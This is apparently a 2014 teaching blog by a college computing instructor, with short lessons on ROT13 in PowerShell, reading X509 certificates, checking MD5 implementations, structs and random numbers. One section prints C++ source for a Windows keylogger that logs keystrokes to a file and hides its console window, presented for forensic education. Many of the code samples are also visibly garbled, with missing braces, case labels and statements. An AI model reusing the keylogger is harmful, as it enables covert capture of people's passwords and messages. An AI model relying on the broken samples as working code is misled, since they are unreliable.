Monday, December 22, 2014

ROT13 in Powershell

Let see if someone would like to talk about this function. You can open your administrative command prompt and type powershell. Copy and paste the following function onto the powershell command line.

Function Rot_num([string]$str, $n)
For ($index= 0;$index -lt $str.length;$index++){
$ch= [byte][char]($str.substring($index,1))
if ($ch-ge 97 -and $ch -le 109){$ch=$ch+ $n}
else {
if ($ch-ge 110 -and $ch -le 122){$ch=$ch- $n}
else {
if ($ch-ge 65 -and $ch -le 77){$ch=$ch+ $n}
else {
if ($ch-gt 78 -and $ch -le 90){$ch=$ch -$n}
$value=$value+ [char]$ch
Return $value

After you have pasted the function above, you can start using it to see how it works. Just type rot_num followed by a string and the number 13. Then you can do the same to decrypt the value by typing rot_num encrypted message and the number 13 again. It should decrypt the encrypted message.

PS C:\> Rot_num Hell0Urhere2014 13
PS C:\> Rot_num Uryy0Heurer2014 13

So, talk about what this code does and what is ROT-13.


In many case, students learn coding because it is in the computer science curriculum, but until graduate school. computer science is nothing else but coding without many real world applicable meaning of those skills.

Using learned skills take time and applying the skills learned in the classroom takes time or will it?  Programming languages evolved to a stage where traditional computer science classes should produce skills much quicker than even 10-15 years ago.  Languages like Scratch, Kodu, SmallBasic, ... can teach kids from age 6-7 to code code that used to take weeks to create.  Thus, we should be able to apply learned skills in much higher level by the time students reach college.

That requires learning the environment and terminology where the code will be placed, what we refer to as Information Technology ( I.T. ).  What is the point to let a programmer design a code that will be used in a network environment if the programmer have no idea what broadcast traffic is and the final code will broadcast so much that will bring the whole network to a halt.

Code can be performing the same function we talked about in the early stage of programming, but elevate the skills to include security concepts even at the simplest level.

Let see what we can do about understanding X509 certificates used in the Public Key Infrastructure ( PKI ) environment.

Generate a a public / private key certificate on your computer that can be used with Microsoft's Encrypting File Systems ( EFS ) to be the recovery agent.  Recovery Agents are used to help users get back to their files in case if the user forgets the password or if the user's certificate is lost or corrupted.  It might be considered the "back door", but for good purpose and need to know how to manage this configuration to provide security instead of vulnerability.

In forensic investigation, we also need to know how to use this process in order to recover user files for investigations and what are the consequences of resetting system passwords without actually finding the user's password.  Offline resetting user password will lose our ability to recover file content with the user's credentials, but we can still get to the user file content using the recovery agent credentials.

C:\>cipher /rc:\temp\recoveryAgent
Please type in the password to protect your .PFX file:
Please retype the password to confirm:

Your .CER file was created successfully.
Your .PFX file was created successfully.

At this point, we have a certificate that we can work with, but you might want to see how to use it in the operating system.

Type certmgr.msc and import the certificate.  Double click on the certificate to see its details.

So, can we see the same type of information by writing our own code?  We should be able to read the details of this certificate by using predefined libraries where we do not need to implement a class full of methods and dissect the structure in a "painful" way.  Technology can help and we can read teh certificate like we read any other simple text input file.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Security;
using System.Net;
using System.Security.Cryptography.X509Certificates;

namespace ReadCert
    class Program
        static void Main(string[] args)
            X509Certificate cert = X509Certificate.CreateFromCertFile("c:\\temp\\recoveryAgent.cer");
            System.Console.WriteLine("Serial Number: {0}", cert.GetSerialNumberString());
            System.Console.WriteLine("Effective Date: {0}", cert.GetEffectiveDateString());
            System.Console.WriteLine("Name: {0}", cert.GetName());
            System.Console.WriteLine("Public Key: {0}", cert.GetPublicKeyString());
            System.Console.WriteLine("Pblick Key Algorithm: {0}", cert.GetKeyAlgorithm());
            System.Console.WriteLine("Issuer: {0}", cert.GetIssuerName());

The output will show something like this:
Serial Number: 1B982E5AE7996DB54A2539E549580EAF
Effective Date: 10/21/2014 7:41:40 AM
Name: CN=Zoltan, L=EFS, OU=EFS File Encryption Certificate
Public Key: 3082010A0282010100C8CB222A159660D559147EA174004766B619B1C6478897F6DF
Pblick Key Algorithm: 1.2.840.113549.1.1.1
Issuer: CN=Zoltan, L=EFS, OU=EFS File Encryption Certificate
You still have to understand what this means and how to use it, but it is much better conversation than writing the good old "Hello World" read from a text file.  Embrace technology and learn about I.T. with coding in mind not the traditional business based computer science based thinking to find the area of the pizza pie. 

Hash and test

One of the most basic concept we learn in digital forensics is to ensure our evidence is not changed after acquisition is hashing.  Hashing helps verify the integrity of the data and helps reduce the dataset by identifying known good files.  Hashes can also identify known "bad" data or partial hashes can identify data that are close enough to investigate further for relevance.  Of course, hashes are also used to store passwords for authentication.  There are many algorithms available, but each algorithm must work exactly the same in software implementations.

When using libraries and third party implementations, you still need to test and validate if the implementation works are designed and implemented properly.

The following is an implementation using third party library:

using System;
using XCrypt;
//Click to download source "Download source code"
//Click on Project -> Add Reference -> navigate to where you have extracted XCrypt.dll

namespace hashMD5
    class Program
        static void Main(string[] args)
            XCryptEngine encrypt = new XCryptEngine();
            Console.WriteLine("Enter string to hash:");
            string inText = Console.ReadLine();
            string hashText = encrypt.Encrypt(inText);
            Console.WriteLine("Input: {0}\r\nHash: {1}", inText, hashText);
            byte[] temp=GetBytes(hashText);  //for debugging to see each byte value

        static byte[] GetBytes(string str)
            byte[] bytes = new byte[str.Length * sizeof(char)];
            System.Buffer.BlockCopy(str.ToCharArray(), 0, bytes, 0, bytes.Length);
            return bytes;

Running the code results in the following output.

Enter string to hash:
Richland College
Input: Richland College
Hash: zlC4yZP3XqYqqboh5Lv4IA== 

The output looks strange and more like Base64 than MD5.  We can place break points in the code and monitor for the actual byte values to see the results to see if it is even close to the actual solution.

We can see the hash values are 122, 0 , 108, 0 ...
Now, let see another program implementation of MD5:
using System;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;

namespace anotherHashMD5SHA1
    class Program
        static void Main(string[] args)
            Console.WriteLine("Enter an message: ");
            string message = Console.ReadLine();
            System.Text.ASCIIEncoding encoding = new System.Text.ASCIIEncoding();
            MD5 md5 = new MD5CryptoServiceProvider();
            SHA1 sha1 = new SHA1CryptoServiceProvider();
            byte[] messageBytes = encoding.GetBytes(message);
            byte[] hashmessage = md5.ComputeHash(messageBytes);
            string stringMD5 = ByteToString(hashmessage);
            hashmessage = sha1.ComputeHash(hashmessage);
            string stringSHA1 = ByteToString(hashmessage);
            Console.WriteLine("MD5: {0}\r\nSHA-1: {1}", stringMD5, stringSHA1);
//Console.WriteLine("MD5: {0}\r\nSHA-1: {1}",System.Text.Encoding.Default.GetString(hashmessage), stringSHA1);

        public static string ByteToString(byte[] buff)
            string sbinary = "";
            for (int i=0; i < buff.Length; i++)
                sbinary += buff[i].ToString("X2");
            return (sbinary);
And the output of this code is as follows,
Enter an message:
Richland College
MD5: CE50B8C993F75EA62AA9BA21E4BBF820
SHA-1: B3A6FC316A94949871594C633C8977D28C70E8B7
So, we also need to see what the resulting byte values are for the hash value in order to see if we just have different encoding of the same byte values displayed and the results are really the same or not.
No, we do not have the same byte values, this one gives us 206, 80, 184, 201, ..., so witch one do we trust and use in our code?
You can use a few IT tools to see what the results of those tools will be.  I recommend HashOnClick.
You can create a simple text file, in this case, I used the same text like I used with tool, "Richland College".  
CE50B8C993F75EA62AA9BA21E4BBF820 testfile.txt
The results show the same value as the second code sample, so the second code sample should be implemented.
So, as you can see, there are many implementations of the same algorithm and programmers should use libraries and code from others as much as possible to increase productivity and reduce development time, but only responsible code selection can lead to meaningful and more secure code.  Maybe secure coding should have a prerequisite of knowing IT tools and understanding what we expect tools to do before we try to implement code by compiling and "crossing fingers".

Signature of compiled code

Now, this example is for educational purposes only and you should not run this code on your own machine if you are not familiar with all of the lines in this code.

Keyloggers have been viewed as something only people with bad intention write, but it is nothing more than monitoring the keys that are pressed on the keyboard and saving them in a file for later review.

In investigation, you might have to look at code and identify basic pattern in order to "guess" what the code is designed to do.  In this example, you can see the basic feature of a keylogger and I hope it will teach you that simple code like this can be added to any code to accomplish the same.  Thus, downloading so called pirated and illegal or cracked version of applications can contain this type of added code.  For the user, the functionality of the application will not visibly change, but the application might have "added features" that users are not aware of.

In many cases, executable analysis is just a simple strings search that can reveal keywords compiled inside the executable that can be googled and lead to understand some of the features of the program.  We can see the message and a clear text of the file that is used to collect the captured keystrokes.  If the code would connect to a server on the Internet, we might even see the URL or the IP address of the server the data is exfiltrated to.

So, this case a simple keyword search on the executable reveals a portion of my code, thus the intended purpose.  So, code might be analyzed by non-programmers and still have a successful heuristic conclusion of what a code or a portion of the code is designed to do.

Warning: You will need to look at your taskmanager in order to stop this program from running.

#include <string>

using namespace std;
int Save(int key_stroke, string file);
void Stealth();

int main(){

char i;

        cout << "This is my example of a keylogger - Zoltan" << endl;

while (1){
for (i = 8; i <= 190; i++){
if (GetAsyncKeyState(i) == -32767)
Save(i, "collect.txt");
return 0;

int Save(int key_stroke, string file){
if ((key_stroke == 1) || (key_stroke == 2))
return 0;

ofstream outFile;
char pressed;
pressed = key_stroke;, std::fstream::app);
cout << VK_OEM_PERIOD << endl;
outFile << "\n";
switch (key_stroke){
case 8:
outFile << "[BACKSPACE]";
case 13:
outFile << " ";
case  VK_OEM_PERIOD:  //same as 190
outFile << ".";
case VK_TAB:
outFile << "[TAB]";
case VK_SHIFT:
outFile << "[SHIFT]";
outFile << "[CONTROL]";
outFile << "[ESCAPE]";
case VK_END:
outFile << "[END]";
case VK_LEFT:
outFile << "[LEFT]";
case VK_UP:
outFile << "[UP]";
case VK_RIGHT:
outFile << "[RIGHT]";
case VK_DOWN:
outFile << "[DOWN]";
case VK_HOME:
outFile << "[HOME]";
case 110:
outFile << ".";
outFile << pressed;

return 0;

void Stealth(){
HWND stealth;
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);

The value of pseudo code

Sometimes, you will need to understand the problem and write a pseudo code before you even start thinking about solving problems.

i.e To determine whether a year is a leap year, follow these steps:

       1. If the year is evenly divisible by 4, go to step 2. Otherwise, go to step 5.
       2. If the year is evenly divisible by 100, go to step 3. Otherwise, go to step 4.
       3. If the year is evenly divisible by 400, go to step 4. Otherwise, go to step 5.
       4. The year is a leap year (it has 366 days).
       5. The year is not a leap year (it has 365 days).

So, what is the pseudo code for this problem?

Thiniking about objects

One of the most important concepts in computer science is to start thinking in objects where structures are the basic building blocks. Structures are the simplest objects that can be defined by users. In this example you can see that you can define a dataType called rooms and those rooms have a structure inside holding many different simple dataTypes like int, bool, and float. Each declared identifier of room type will have the same structure inside, but the values are assigned to reflect the specific room characteristics. The period character in this case is used as a member operator to have access to each identifier inside the structure. 

‪#‎include‬ <iostream>

using namespace std;

//Create a container that will hold individual room specific contents
struct room{
                   bool table;
                   int chairs;
                   float classAverage;
                   bool projector;
                   int windows;
                   int doors;
                   string keyNumber;
                   string roomName;

int main(){
         room D155;                    //Create a specific room and set its unique characteristics 
         D155.chairs = 25;
         D155.classAverage = 93.75;
         D155.keyNumber = "78M"; = 0;
         D155.projector = true;
         D155.table = true;
         D155.doors = 1;
         D155.roomName = "D155";

         cout << "The room number is:" <<D155.roomName<< endl;
         cout << "The room holds " << D155.chairs
                 <<" and the class average is: "<<D155.classAverage<<endl;
return 0;

Random numbers

Measure the randomness of random number generators. If you find out that random numbers are not really random, then it means you can predict the next value. That would be great in playing casino games or breaking encryption.

‪#‎include‬ <iostream>

using namespace std;

int main(){

              int zero=0,one=0, two=0, three=0, four=0;

              for(int i=0;i<100;i++){
                       srand ( time(NULL) );
                       Richland = rand() % 5;
                             case 0:
                            case 1:
                            case 2:
                            case 3:
                            case 4:

            cout<<"The value of zeroes: "<<zero<<endl;
            cout<<"The value of ones: "<<one<<endl;
            cout<<"The value of twos: "<<two<<endl;
            cout<<"The value of threes: "<<three<<endl;
            cout<<"The value of fours: "<<four<<endl;

            return 0;


You guys can practice your flow charting skills with this great tool that can actually create a working application from flowchart and even create a good enough code in C#, C++, and Java.

Great learning tool -

Sunday, December 21, 2014

Java 01 - Getting Started

If any of you will be taking Java this semester, then you need to get ready by configuring your environment at home.

You can also download a live operating system that is pre-configured for C++, Java, and Python programming.

You can view a video on how to setup and use the live environment: 

Java 02 - Javadoc

In order to use Java and learn the Java documentation process, you might need to be able to know how to navigate in a command line environment in order to understand the easier method of using your IDE that will create the documentation for you. If you have taken C++ and you were annoyed by the header and comments that you had to write, now you will love the java documentation that will take all those comments and convert them into documentation automatically. 

See a video of this process.

Wednesday, December 17, 2014

Check the facts and think critically

Once I was at a conference and the speaker gave a strange analogy of how fast hard drives need to work. He said, "Reading of bits on the hard drive plate is like a fighter jet flying at MOCK-4 1 foot off the ground counting every grass blades on the ground.". Can this be true, can we calculate if he was correct or just exaggerating? How would you start designing this program?

By my calculations, for a 3.5inch hard drive, the outer edge is traveling at 78mph and the inner track at 33.45mph. MOCK-4 is a supersonic speed 3069mph. If I'm correct, he was WAAAAY off. Can you check my values?

Label, For, or While loop performance test

  • This conversation deserves a blog entry.  
  • A: If you find different ways to accomplish the same thing, make sure to test the performance of the code each way at least 3 times and average the results just like in other science classes like physics. I do not see any noticeable difference in any of these implementations. Do you?

  • A A loop is nothing else, but an if statement with a jump. What you do after the comparison and before the jump does not matter. It will not be a jump that slows your code down, but the block that does the work. If you find an example and you can test for performance issues, than we have a case, but until then this is just a rumor. You will also investigate if the code is using the stack or using dynamic heap memory, since that will affect the performance of a code running, but not he simple jump.

Test results do not show any difference.  Any suggestions, comments?  Please, include sample code and/or testing methodology to show any difference that you might believe exists.